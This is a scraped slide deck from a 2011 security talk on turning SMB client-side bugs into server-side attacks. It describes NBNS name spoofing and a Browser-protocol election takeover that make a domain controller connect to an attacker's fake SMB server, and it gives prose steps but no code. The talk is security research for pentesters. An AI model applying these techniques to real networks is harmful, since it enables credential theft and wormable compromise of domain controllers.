Upload
lgandx
View
853
Download
2
Tags:
Embed Size (px)
DESCRIPTION
Turning Client Side To Server Sie
Citation preview
NCC Group Plc, Manchester Technology Centre, Oxford Road, Manchester M1 7EF www.nccgroup.com
NGS Secure
Laurent Gaffié Senior Security Consultant
e-mail: [email protected]
Turning SMB Client Side Bug To Server Side
Ruxcon monthly,
25/ 03/ 2011
Who am I ?
Who ?Laurent Gaffié
Senior Security consultant at NGS Secure
Plenty SMB research
Network/Web app pentesting monkey
Agenda
Turning What ?SMB ProtocolBrowser ProtocolNetbios Name Service
Why Turning ?SMB bug client side
How to Turn ?Netbios Name SpoofingBrowser Protocol
Demo ! Conclusion & Questions
Turning What ?
SMB ProtocolCan be used over: TCP/IP, IPX/SPX, and
NetBEUI
A protocol for printers, file sharing, serial ports
A Transport layer for DCE/RPC/IPC
Run as a Kernel driver
Turning What ?
Browser ProtocolHost announcement
Request announcement
Election
Local Master Browser
Domain Master Browser
Master Announcement
Turning What ?
Netbios Name Service (NBNS)
Name Query Service
Query any domain, UNC, smaller than 16 chars
No check, easily spoofable, leads to MITM.
Name Overwrite Demand - Can overwrite a NBT name on the subnet!
Why Turning ?
SMB bug client sideLots !
Easier to find than server side.
Doesn’t require auth.
Kernel bugs.
Can be automated with no user interaction
How to Turn ?
Netbios Name SpoofingWait for someone to connect to a corporate
share.
Spoof NBNS answer
Server now connects to your fake SMB server as a client
Grab credentials, exploit SMB security issue, escalate privileges on target RPC application, etc
How to Turn ?
Browser ProtocolSend two Reset Browser State Announcement to
the LMB, first one with the flag set to 02 (flush browse lists, restart again) and a second one set to 01 (Demote a LMB to a Backup Browser)
Win the election you’ve launched, since you control the winning criteria.
Become a LMB
How to Turn ?
Browser ProtocolLet know the PDC that you’re now a LMB by
performing a Master Announcement.
The PDC will then connect to your fake SMB server.
The Backup Browser will also perform a SMB connection to the LMB every 15mn to sync his list.
Demo
DEMO !
Conclusion & Questions
ConclusionDue to the particularity of the protocol, SMB
client side bug are as dangerous as server side in a corporate network
Exploiting SMB client side bugs on the PDC with no user interaction, payoff in a pentest…
Since this attack specificaly target the PDC, a reliable client side exploit can be easily wormable.
Conclusion & Questions
Questions ?